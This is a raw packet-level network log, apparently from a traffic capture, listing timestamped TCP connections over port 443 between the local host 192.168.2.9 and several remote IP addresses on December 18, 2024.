Dec 18, 2024 21:09:43.092243910 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.092421055 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.092523098 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.096765041 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.096992970 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.097136021 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.097194910 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.097322941 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.097424030 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.097497940 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.099638939 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.099762917 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.099831104 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.099874020 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.099965096 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.100059032 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.100286961 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.101175070 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.104326010 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104423046 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104469061 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104501009 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104513884 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104526043 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104623079 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104657888 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104666948 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.104679108 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.105906010 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.106318951 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107384920 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107397079 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107471943 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107481956 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107496977 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107508898 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107641935 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107652903 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107675076 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107678890 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107681036 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107697010 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107702017 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107712030 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107753038 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107800961 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107820988 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107835054 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107837915 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107872963 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.107918978 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107937098 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107975960 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.107981920 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108016968 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108037949 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108072042 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108086109 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108091116 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108122110 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108122110 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108128071 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108139038 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108172894 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108192921 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108198881 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108210087 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108230114 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108244896 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108257055 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108257055 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108272076 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.108305931 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.108405113 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.111855984 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.111975908 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.113393068 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.113420010 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.113432884 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.134186983 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.134316921 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.134512901 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.134543896 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.134699106 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.134735107 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.134942055 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.135004997 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.135082960 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.135183096 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.175359011 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.243587017 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.243705988 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.243846893 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.244081020 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.244429111 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.244474888 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.244570971 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.244688034 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.244721889 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.244836092 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.244967937 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.245099068 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.245202065 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.245239973 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.245526075 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.245625973 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.245740891 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.245865107 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.246118069 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.246218920 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.246359110 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.246480942 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.246586084 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.246615887 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.246701002 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.246730089 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.246967077 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.247070074 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.247104883 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.247277021 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.247369051 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.247890949 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.248045921 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.248158932 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.248188972 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.248240948 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.248382092 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.248486996 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.248631954 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.248773098 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.249159098 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.249206066 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.249257088 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.249356031 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.249444008 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.363117933 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.363289118 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.363343000 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.363431931 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.363883018 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.364012957 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.364032984 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.364206076 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.364470005 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.364752054 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.364778042 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.364809990 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.364969015 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.365078926 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.365113020 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.365403891 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.365518093 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.365639925 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.365906954 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.366022110 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.366153955 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.366303921 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.366463900 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.366543055 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.366692066 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.366868973 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.366942883 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.367142916 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.367250919 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.367537975 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.367702961 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.367806911 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.367858887 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.368689060 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.368798018 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.368849993 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.369035006 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.369157076 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.369191885 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.369268894 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.369540930 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.369744062 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.369832039 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.370198011 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.370309114 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.370361090 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.370642900 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.370790958 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.370867968 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.373711109 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.374162912 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.375808001 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.577207088 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.618861914 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:43.618902922 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:43.618982077 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:43.619441986 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:43.619458914 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:43.622095108 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:43.622152090 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:43.622214079 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:43.622509003 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:43.622528076 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:44.172679901 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:44.172761917 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:44.173490047 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:44.173497915 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:44.175533056 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:44.175539970 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:44.448901892 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:44.448944092 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:44.450177908 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:44.453600883 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:44.453618050 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:44.616489887 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:44.616522074 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:44.616750956 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:44.617028952 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:44.617037058 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.064536095 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.064559937 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.064604998 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.064640999 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.064656019 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.064656973 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.064686060 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.064721107 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.064975023 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.064992905 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.067418098 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.067454100 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.067636013 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.067850113 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:45.067861080 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:45.370079041 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.370429039 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.370460033 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.370865107 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.371174097 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.371251106 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.371340036 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.371392012 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.371416092 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.374545097 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.374716997 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.374738932 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.375094891 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.375370026 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.375442982 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.375463963 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.375534058 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.375551939 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.877371073 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.877471924 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.877522945 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.878175974 CET	49853	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.878190041 CET	443	49853	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.986927032 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.987010956 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.987798929 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.987833977 CET	443	49854	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:45.987871885 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:45.987952948 CET	49854	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.198829889 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.200388908 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.200417995 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.201916933 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.201983929 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.202466965 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.202543974 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.202704906 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.202795982 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.202810049 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.256618023 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.393484116 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.395528078 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.395545959 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.397236109 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.397315979 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.398020983 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.398102999 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.398185015 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.398293972 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.398309946 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.442989111 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.468497992 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:46.471328020 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:46.483174086 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:46.483186007 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:46.484966040 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:46.484987974 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:46.703104973 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.703358889 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.703502893 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.704226971 CET	49855	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.704245090 CET	443	49855	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.896223068 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.896740913 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.897057056 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.897083044 CET	443	49856	51.104.15.253	192.168.2.9
Dec 18, 2024 21:09:46.897094011 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:46.897161007 CET	49856	443	192.168.2.9	51.104.15.253
Dec 18, 2024 21:09:47.365935087 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:47.365953922 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:47.366020918 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:47.366038084 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:47.366092920 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:47.366517067 CET	49857	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:47.366534948 CET	443	49857	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:47.401998997 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:47.402056932 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:47.402141094 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:47.402395010 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:47.402404070 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:48.173316956 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:48.173408031 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:48.173476934 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:48.173530102 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:48.173607111 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:48.173660994 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:49.050726891 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:49.050909996 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:49.050995111 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:49.051032066 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:49.051212072 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:49.051269054 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:49.051529884 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.051592112 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.052057981 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.052066088 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.054351091 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.054357052 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.471106052 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:09:49.591336966 CET	443	49707	13.107.246.63	192.168.2.9
Dec 18, 2024 21:09:49.592180014 CET	49707	443	192.168.2.9	13.107.246.63
Dec 18, 2024 21:09:49.922471046 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.922543049 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.922650099 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.922668934 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.923567057 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.923753023 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.923826933 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.923959017 CET	49860	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:49.923974037 CET	443	49860	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:49.925451040 CET	49846	443	192.168.2.9	94.130.191.168
